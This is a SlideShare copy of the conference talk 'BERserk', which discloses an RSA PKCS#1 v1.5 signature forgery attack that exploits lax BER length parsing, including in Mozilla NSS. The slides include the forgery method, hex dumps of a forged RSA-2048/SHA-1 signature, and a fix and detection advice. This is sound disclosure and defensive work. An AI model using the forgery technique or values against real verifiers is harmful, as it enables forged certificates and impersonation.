SlideShare a Scribd company logo
1 of 24
Download to read offline
BERserk: New RSA Signature Forgery Attack 
Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alex Matrosov, Mikhail Gorobets 
ekoparty10
2 
Bleichenbacher’sPKCS#1 v1.5 Vulnerability 
defPKCS1v15_verify(hash,sig,pubkey): 
# decrypt EM from signature using public key 
EM =pubkey.encrypt(sig,0)[0] 
.. 
# check PS padding bytes 0xFF 
while((i<RSA_MODULUS_LEN)and(ord(EM[i])==0xFF)):i+=1 
.. 
i+=1 
ifi<11: returnSIGNATURE_VERIFICATION_FAILED 
T =EM[i:] 
T_size=len(T) 
(status,hash_from_EM,DI_size)=RSA_BER_Parse_DigestInfo(T,T_size) 
ifPADDING_OK !=status:returnSIGNATURE_VERIFICATION_FAILED 
# Verifying message digest 
if(hash !=hash_from_EM):returnSIGNATURE_VERIFICATION_FAILED 
returnSIGNATURE_VERIFICATION_PASSED
3 
Fix (Well.. one of) 
(status,hash_from_EM,DI_size)=RSA_BER_Parse_DigestInfo(T,T_size) 
ifPADDING_OK !=status: 
returnSIGNATURE_VERIFICATION_FAILED 
HASH_LEN =len(hash) 
if(T_size!=(DI_size+HASH_LEN)): 
returnSIGNATURE_VERIFICATION_FAILED 
# Verifying message digest 
if(hash !=hash_from_EM): 
returnSIGNATURE_VERIFICATION_FAILED 
returnSIGNATURE_VERIFICATION_PASSED 
Make sure there’s no extra data left after the DigestInfo| Hash
4 
Wait! Parsing DigestInfo!? 
Exactly why do you need to parse 19 (15, 18)-byte long string as ASN.1?? 
30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 
RSA_BER_Parse_DigestInfo(T,T_size)
5 
BER/DER Encoding of ASN.1 Lengths 
Identifier/Tag octets 
Length 
octets 
Contents 
octets 
[End-of-contents octets] 
BER Structure 
1 
0 
0 
0 
0 
0 
0 
Length Field 
Short or Long Length 
Short: Length of ASN.1 element 
Long: How many following octets describe the length of ASN.1 element (≤ 127) 
1 
Reference:ITU-T X.690 “Information technology -ASN.1 encoding rules: Specification of BER, CER and DER”
6 
•DER is BER with additional restrictions! 
•DER: The definite form of length encoding shall be used, encoded in the minimum number of octets. 
•Both examples below describe ASN.1 lengths of 9bytes: 
BER vsDER 
Valid BER, Invalid DER 
Valid BER, Valid DER 
1 
0 
0 
0 
0 
0 
0 
1 
0 
0 
0 
1 
0 
0 
1 
0 
0 
0 
0 
0 
1 
0 
0 
1
7 
Correct ASN.1 DigestInfo(SHA-256) 
3031300d060960864801650304020105000420XXXXXXXXXXXXXXXXXXXX 
Tag Length 
30(SEQUENCE)31 
Tag Length 
30(SEQUENCE)0d 
Tag Length 
06(OID)09 
OID 
608648016503040201 
Tag Length 
05(NULL)00 
Tag Length 
04(OCTET STRING)20 
octet string (SHA-256hash) 
XXXXXXXXXXXXXXXXXXXX
8 
•Some crypto implementations would [attempt to] parse DigestInfoASN.1 sequence as BER allowing longlengths of ASN.1 elements 
•Vulnerablecrypto implementations would skip some or all bytes of the lengthallowing up to 127 bytes of extra data 
•The extra data can be used to find such signature without knowing private key that would pass validation 
Vulnerable Implementation 
Extra Data (127 bytes) 
1 
1 
1 
1 
1 
1 
1 
1 
00 
00 
00 
09 
XX 
XX 
…
9 
Malformed ASN.1 DigestInfo 
3031300d060960864801650304020105c3..garbage ..04ff..garbage .. XXXXXXXXXXXXXXXXXXXX 
Tag Length (long form) 
30(SEQUENCE)32 
Tag Length (long form) 
30(SEQUENCE)0d 
Tag Length 
06(OID)05 
OID 
608648016503040201 
Tag Length (long form) 
05(NULL)c3(80|43)..garbage .. 
Tag Length 
04(OCTET STRING)ff(80|7f)..garbage .. 
octet string (SHA-256hash) 
XXXXXXXXXXXXXXXXXXXX
10 
Adding Extra Data in DigestInfo 
•By shortening the padding and inserting long lengths adversary can add extra data in DigestInfoASN.1 sequence 
“ .. “ Describes extra “Garbage” data 
Correct PKCS#1 v1.5 with DER DigestInfo 
Bad PKCS#1 v1.5: extra data in BER DigestInfo
11 
•Forged Encoded Message (EM’) = Prefix + Middle + Suffix 
•Middle part includes fixed octets surrounded by extra “garbage” data 
–Length field(s) represent size of the new added data 
•Forged Signature S’is such that EM’=(S’) 3 
•S’is represented as (h+m+l)such that EM’=(h+m+l) 3 
•To find S’adversary needs to find such high (h), middle (m) and low (l) parts of the signature 
Forging a Signature
12 
Calculating the Encoded Message 
Prefix 
Middle 
Suffix
13 
•High, middle and low parts of the signature can be calculated independently to satisfyPrefix + Middle + Suffix = (h+ m+ l) 3 
•Finding fixed octets in the middle part: 
1.If fixed octets are adjacent to Prefix or Suffix parts, mcan be solved as part of calculating Prefix or Suffix 
2.If number of fixed octets is small, mcan be found by exhaustive search (by incrementing bytes of mabove l) 
3.mcan be found by solving elements of cube of sum of all three parts of the signature which affect the Middle part of the cube 
Calculating the Encoded Message (Cont’d)
14 
Forged Signature (S’) 
0000000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000001000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000002000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000003000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000004000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000005000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000006000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000007000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000008000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
0000009000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
000000a000 00 00 00 00 00 00 00 00 00 00 32 cbfd4a 7a 
000000b0dc 79 05 58 3d 76 75 20 f5 16 40 75 91 76 d3 78 
000000c026 f2 ef63 b4 b400 00 00 00 00 00 00 00 00 00 
000000d000 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 7a 
000000e0fa9a e7 78 68 89 39 47 83 14 5e 11 91 a9 a4 ac 
000000f0bd7b fccb4d a0 7e 9f fc60 ad f2 4a c6 a1 cd
15 
Forged Encoded Message (EM’) 
0000000000 01 ff ffffffffffffff00 30 31 30 0d 06 
0000001009 60 86 48 01 65 03 04 02 01 05c368 9b 67 e3 
000000206c 25 a4 a2 f3 23 2d 63 cfaf1a 19 f0 d4 a8 78 
00000030b9 bf b9 12 fd1c 00 95 74 f1 1f ed69 23 14 46 
00000040f6 c2 aab2 21 54 7e ce2f 18 8d 5f 45 bb d6cd 
00000050ad 25 06 50 98 68 11 b9 2a a1 0b b8 ca 7d 59 04 
00000060ff4f da00 db 7f 2a c3 39 a0 ff ca baca 6f d8 
00000070a2 19 3f 6b 42 07 9d 11 58 fc59 7d 51 d7 08 98 
0000008042 5a f8 92 16 ee07 8b 5b 9a 6d c5 f8 00 80 d5 
00000090b1 a3 47 56 b2 ddc6 d6 5c 13 98 4d bf 03 ad b0 
000000a032 f8 8b 4d 5b 40 b7 ef8f fc4d 6b e3 e1 bb 1f 
000000b058 a8 a3 41 55 22 00 84 4c b0 eb26 9f 64 a6 28 
000000c04b a9 a5 62 a5 6a aeef00 f3 a9 d2 3d 6b f8 83 
000000d02b e1 86 55 22 55 16 f4 3d 88 7c 74 b5 dfa4 b2 
000000e048 ac e9 b7 bc30 cb37 33 84 19 f7 71 6d 4e 9f 
000000f050 aa0a d2 a4 25 bcf3 8c 2a 11 66 9f 85 cfd5
16 
A Case of Mozilla NSS 
The issue in Mozilla NSS library was independently discovered and reported by Antoine Delignat-Lavaud (INRIA Paris, PROSECCO)
17 
staticSECStatusDecodeSequence(void*dest, 
… 
do 
{ 
… 
rv=DecodeItem(dest,sequenceEntry,&sequence,arena,PR_TRUE); 
… 
}while((SECSuccess==rv)&& 
(sequenceEntry->kind && 
sequenceEntry->kind !=SEC_ASN1_SKIP_REST)); 
/* we should have consumed all the bytes in the sequence by now 
unless the caller doesn't care about the rest of the sequence */ 
if(SECSuccess==rv&&sequence.len&& 
… 
rv=SECFailure; 
} 
returnrv; 
} 
ASN.1 Decode in NSS 
Verifies no extra data left after decoding ASN.1 sequence 
Mozilla NSS honestly & completely decodes DigestInfoas ASN.1 sequence according to sgn_DigestInfoTemplatetemplate
18 
How Many Bytes Can BER Length Have? 
staticunsignedchar*definite_length_decoder(constunsignedchar*buf, 
constunsignedintlength, 
unsignedint*data_length, 
PRBoolincludeTag) 
{ 
unsignedintdata_len; 
.. 
data_len=buf[used_length++]; 
if(data_len&0x80) 
{ 
intlen_count=data_len&0x7f; 
data_len=0; 
while(len_count-->0) 
{ 
.. 
data_len=(data_len<<8)|buf[used_length++]; 
} 
} 
.. 
*data_length=data_len; 
return((unsignedchar*)buf+(includeTag?0:used_length)); 
} 
len_countcan be up to 127 
data_lenis unsigned integer 
What about other 123 bytes?
19 
Malformed ASN.1 DigestInfo(SHA-1) 
30db..garbage ..000000 a030 ff..garbage ..0000000906052b0e03021a05000414XXXXXXXXXXX 
Tag Length (long form) 
30(SEQUENCE)db(80|5b)..garbage ..000000a0 
Tag Length (long form) 
30(SEQUENCE)ff(80|7f)..garbage ..00000009 
Tag Length 
06(OID)05 
OID 
2b0e03021a 
Tag Length 
05(NULL)00 
Tag Length 
04(OCTET STRING)14 
octet string (the SHA1 hash) 
XXXXXXXXXXX
20 
6 bytes in the middle of EM’ are 000000EL30LLmust have up to 127 bytes of garbage on both sides which defines a rangewhere these 6 bytes can be placed 
EM’=(S’)3 = (h+m+l)3= (h+l)3+ 3(h+l)2 m + 3(h+l)m2+ m3 
Only (h+l)3and 3(h+l)m2affect upper 6 bytes of the range 
m is found from these terms 
Forging RSA-2048 in Mozilla NSS 
00010030DB4A92154840980EF454EE2431A72B632170288000000000000000000000000000000000000000000000000014F278C9885FD01CA0329882DE2961783078704C19385293E42956ED1E32AD0EEDCBCE0A74443AF5E8123A07000000A030FF3B8C0DC54EE667655405C4B357D467FCD68517EA337E6FC70F76656068BB6CD5E41F24048F238132B3C681AAF6375A4506954EFB62EF7124B2FE365B497EA84C8E4AA137CA3B39DB693D0CCDDD2E9ACD6EF240D3E751BD77D8BC5F2C4384235D7EC85F7B5DB7F8A48AF2EE6ED49F1B89E264C3D928C3E387D974E00000000906052B0E03021A050004143C03741AFCA732172F45829A0FD8D14B480CA4C1
21 
Forged RSA-2048 / SHA-1 Signature 
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002853D660D0AE8E20000000000000000000000000000000000000000000000000000000000000000000000000000001195F4F8677641705A29EBDB3067E5F212ABFF010C999CBAB522DA0BCB588C5E93DD2B31F7C41 
00010030DB4A92154840980EF454EE2431A72B632170288000000000000000000000000000000000000000000000000014F278C9885FD01CA0329882DE2961783078704C19385293E42956ED1E32AD0EEDCBCE0A74443AF5E8123A07000000A030FF3B8C0DC54EE667655405C4B357D467FCD68517EA337E6FC70F76656068BB6CD5E41F24048F238132B3C681AAF6375A4506954EFB62EF7124B2FE365B497EA84C8E4AA137CA3B39DB693D0CCDDD2E9ACD6EF240D3E751BD77D8BC5F2C4384235D7EC85F7B5DB7F8A48AF2EE6ED49F1B89E264C3D928C3E387D974E00000000906052B0E03021A050004143C03741AFCA732172F45829A0FD8D14B480CA4C1 
Forged signature (S’) 
Decrypted signature (S’)3
22 
•“BERSerk” is not one bug but rather a class of bugs when parsing BER lengths. Each implementation is different 
•Parsing DigestInfoas ASN.1 is a bad idea. There are just a few short DigestInfosequences that an implementation needs to compare with 
•Detecting forged PKCS#1 v1.5 signatures: 
–Does the signature have a bunch of zeros? Suspicious! 
–More precise, does (signature)3< RSA modulusfor any certificate in the chain? Forged certificate! 
Conclusions / Recommendations
23 
•Part 1: RSA signature forgery attack due to incorrect parsing of ASN.1 encoded DigestInfoin PKCS#1 v1.5 
•Part 2: Certificate Forgery in Mozilla NSS 
References
24 
Thank You! 
Many thanks to Francisca Moreno and Charles McFarland for help with the presentation!

More Related Content

What's hot

Program for hamming code using c
Program for hamming code using cProgram for hamming code using c
Program for hamming code using c
snsanth
 
Степан Кольцов — Rust — лучше, чем C++
Степан Кольцов — Rust — лучше, чем C++Степан Кольцов — Rust — лучше, чем C++
Степан Кольцов — Rust — лучше, чем C++
Yandex
 

What's hot (18)

Code em Poker
Code em PokerCode em Poker
Code em Poker
 
C++ L04-Array+String
C++ L04-Array+StringC++ L04-Array+String
C++ L04-Array+String
 
C++ L07-Struct
C++ L07-StructC++ L07-Struct
C++ L07-Struct
 
C++ L05-Functions
C++ L05-FunctionsC++ L05-Functions
C++ L05-Functions
 
The Ring programming language version 1.8 book - Part 66 of 202
The Ring programming language version 1.8 book - Part 66 of 202The Ring programming language version 1.8 book - Part 66 of 202
The Ring programming language version 1.8 book - Part 66 of 202
 
CONFidence2015: Who put the backdoor in my modem? - Ewerson (Crash) Guimaraes
CONFidence2015: Who put the backdoor in my modem? - Ewerson (Crash) Guimaraes CONFidence2015: Who put the backdoor in my modem? - Ewerson (Crash) Guimaraes
CONFidence2015: Who put the backdoor in my modem? - Ewerson (Crash) Guimaraes
 
ゲーム理論BASIC 第37回 -カーネル-
ゲーム理論BASIC 第37回 -カーネル-ゲーム理論BASIC 第37回 -カーネル-
ゲーム理論BASIC 第37回 -カーネル-
 
Bugs
BugsBugs
Bugs
 
The Ring programming language version 1.4.1 book - Part 15 of 31
The Ring programming language version 1.4.1 book - Part 15 of 31The Ring programming language version 1.4.1 book - Part 15 of 31
The Ring programming language version 1.4.1 book - Part 15 of 31
 
Lập trình Python cơ bản
Lập trình Python cơ bảnLập trình Python cơ bản
Lập trình Python cơ bản
 
Hta r31
Hta r31Hta r31
Hta r31
 
Whispered secrets
Whispered secretsWhispered secrets
Whispered secrets
 
Program for hamming code using c
Program for hamming code using cProgram for hamming code using c
Program for hamming code using c
 
Documento de acrobat2
Documento de acrobat2Documento de acrobat2
Documento de acrobat2
 
gemdiff
gemdiffgemdiff
gemdiff
 
Whispered secrets
Whispered secretsWhispered secrets
Whispered secrets
 
Степан Кольцов — Rust — лучше, чем C++
Степан Кольцов — Rust — лучше, чем C++Степан Кольцов — Rust — лучше, чем C++
Степан Кольцов — Rust — лучше, чем C++
 
BlockchainDay "Ethereum Dapp - Asset Exchange YOSEMITE alpha" Session
BlockchainDay "Ethereum Dapp - Asset Exchange YOSEMITE alpha" Session BlockchainDay "Ethereum Dapp - Asset Exchange YOSEMITE alpha" Session
BlockchainDay "Ethereum Dapp - Asset Exchange YOSEMITE alpha" Session
 

Viewers also liked

BIOS and Secure Boot Attacks Uncovered
BIOS and Secure Boot Attacks UncoveredBIOS and Secure Boot Attacks Uncovered
BIOS and Secure Boot Attacks Uncovered
Alex Matrosov
 
14 key management & exchange
14   key management & exchange14   key management & exchange
14 key management & exchange
drewz lin
 
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in RussiaModern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Alex Matrosov
 
Win32/Duqu: involution of Stuxnet
Win32/Duqu: involution of StuxnetWin32/Duqu: involution of Stuxnet
Win32/Duqu: involution of Stuxnet
Alex Matrosov
 
Reconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemReconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis Problem
Alex Matrosov
 
Festi botnet analysis and investigation
Festi botnet analysis and investigationFesti botnet analysis and investigation
Festi botnet analysis and investigation
Alex Matrosov
 
Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
Modern Bootkit Trends: Bypassing Kernel-Mode Signing PolicyModern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
Alex Matrosov
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Alex Matrosov
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/Gapz
Alex Matrosov
 
Carberp Evolution and BlackHole: Investigation Beyond the Event Horizon
Carberp Evolution and BlackHole: Investigation Beyond the Event HorizonCarberp Evolution and BlackHole: Investigation Beyond the Event Horizon
Carberp Evolution and BlackHole: Investigation Beyond the Event Horizon
Alex Matrosov
 
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor SkochinskyインテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
CODE BLUE
 
Bootkits: past, present & future
Bootkits: past, present & futureBootkits: past, present & future
Bootkits: past, present & future
Alex Matrosov
 

Viewers also liked (20)

BIOS and Secure Boot Attacks Uncovered
BIOS and Secure Boot Attacks UncoveredBIOS and Secure Boot Attacks Uncovered
BIOS and Secure Boot Attacks Uncovered
 
Моделирование угроз для BIOS и UEFI
Моделирование угроз для BIOS и UEFIМоделирование угроз для BIOS и UEFI
Моделирование угроз для BIOS и UEFI
 
14 key management & exchange
14   key management & exchange14   key management & exchange
14 key management & exchange
 
Defeating x64: The Evolution of the TDL Rootkit
Defeating x64: The Evolution of the TDL RootkitDefeating x64: The Evolution of the TDL Rootkit
Defeating x64: The Evolution of the TDL Rootkit
 
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in RussiaModern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
 
Win32/Duqu: involution of Stuxnet
Win32/Duqu: involution of StuxnetWin32/Duqu: involution of Stuxnet
Win32/Duqu: involution of Stuxnet
 
Reconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemReconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis Problem
 
Festi botnet analysis and investigation
Festi botnet analysis and investigationFesti botnet analysis and investigation
Festi botnet analysis and investigation
 
HexRaysCodeXplorer: make object-oriented RE easier
HexRaysCodeXplorer: make object-oriented RE easierHexRaysCodeXplorer: make object-oriented RE easier
HexRaysCodeXplorer: make object-oriented RE easier
 
Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
Modern Bootkit Trends: Bypassing Kernel-Mode Signing PolicyModern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/Gapz
 
Carberp Evolution and BlackHole: Investigation Beyond the Event Horizon
Carberp Evolution and BlackHole: Investigation Beyond the Event HorizonCarberp Evolution and BlackHole: Investigation Beyond the Event Horizon
Carberp Evolution and BlackHole: Investigation Beyond the Event Horizon
 
42054960
4205496042054960
42054960
 
Object Oriented Code RE with HexraysCodeXplorer
Object Oriented Code RE with HexraysCodeXplorerObject Oriented Code RE with HexraysCodeXplorer
Object Oriented Code RE with HexraysCodeXplorer
 
Smartcard vulnerabilities in modern banking malware
Smartcard vulnerabilities in modern banking malwareSmartcard vulnerabilities in modern banking malware
Smartcard vulnerabilities in modern banking malware
 
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor SkochinskyインテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode Rootkits
 
Bootkits: past, present & future
Bootkits: past, present & futureBootkits: past, present & future
Bootkits: past, present & future
 
Win32/Flamer: Reverse Engineering and Framework Reconstruction
Win32/Flamer: Reverse Engineering and Framework ReconstructionWin32/Flamer: Reverse Engineering and Framework Reconstruction
Win32/Flamer: Reverse Engineering and Framework Reconstruction
 

Similar to BERserk: New RSA Signature Forgery Attack

A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
Shakacon
 
Key recovery attacks against commercial white-box cryptography implementation...
Key recovery attacks against commercial white-box cryptography implementation...Key recovery attacks against commercial white-box cryptography implementation...
Key recovery attacks against commercial white-box cryptography implementation...
CODE BLUE
 

Similar to BERserk: New RSA Signature Forgery Attack (20)

A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
 
8086 microprocessor lab manual
8086 microprocessor lab manual8086 microprocessor lab manual
8086 microprocessor lab manual
 
8086 labmanual
8086 labmanual8086 labmanual
8086 labmanual
 
Troubleshooting Tips and Tricks for Database 19c - Sangam 2019
Troubleshooting Tips and Tricks for Database 19c - Sangam 2019Troubleshooting Tips and Tricks for Database 19c - Sangam 2019
Troubleshooting Tips and Tricks for Database 19c - Sangam 2019
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
 
C++ Code as Seen by a Hypercritical Reviewer
C++ Code as Seen by a Hypercritical ReviewerC++ Code as Seen by a Hypercritical Reviewer
C++ Code as Seen by a Hypercritical Reviewer
 
Key recovery attacks against commercial white-box cryptography implementation...
Key recovery attacks against commercial white-box cryptography implementation...Key recovery attacks against commercial white-box cryptography implementation...
Key recovery attacks against commercial white-box cryptography implementation...
 
Troubleshooting Tips and Tricks for Database 19c ILOUG Feb 2020
Troubleshooting Tips and Tricks for Database 19c   ILOUG Feb 2020Troubleshooting Tips and Tricks for Database 19c   ILOUG Feb 2020
Troubleshooting Tips and Tricks for Database 19c ILOUG Feb 2020
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Embedded systemsproject_2020
Embedded systemsproject_2020Embedded systemsproject_2020
Embedded systemsproject_2020
 
Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020
 
Renas Rajab Asaad
Renas Rajab AsaadRenas Rajab Asaad
Renas Rajab Asaad
 
AES by example
AES by exampleAES by example
AES by example
 
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
Some examples of the 64-bit code errors
Some examples of the 64-bit code errorsSome examples of the 64-bit code errors
Some examples of the 64-bit code errors
 
Vcs24
Vcs24Vcs24
Vcs24
 
Math in V8 is Broken and How We Can Fix It - Athan Reines, Fourier
Math in V8 is Broken and How We Can Fix It - Athan Reines, FourierMath in V8 is Broken and How We Can Fix It - Athan Reines, Fourier
Math in V8 is Broken and How We Can Fix It - Athan Reines, Fourier
 

Recently uploaded

“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
Muhammad Subhan
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
FIDO Alliance
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
FIDO Alliance
 

Recently uploaded (20)

Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
The Ultimate Prompt Engineering Guide for Generative AI: Get the Most Out of ...
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
 
Frisco Automating Purchase Orders with MuleSoft IDP- May 10th, 2024.pptx.pdf
Frisco Automating Purchase Orders with MuleSoft IDP- May 10th, 2024.pptx.pdfFrisco Automating Purchase Orders with MuleSoft IDP- May 10th, 2024.pptx.pdf
Frisco Automating Purchase Orders with MuleSoft IDP- May 10th, 2024.pptx.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Navigating the Large Language Model choices_Ravi Daparthi
Navigating the Large Language Model choices_Ravi DaparthiNavigating the Large Language Model choices_Ravi Daparthi
Navigating the Large Language Model choices_Ravi Daparthi
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream Processing
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
الأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهالأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهله
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
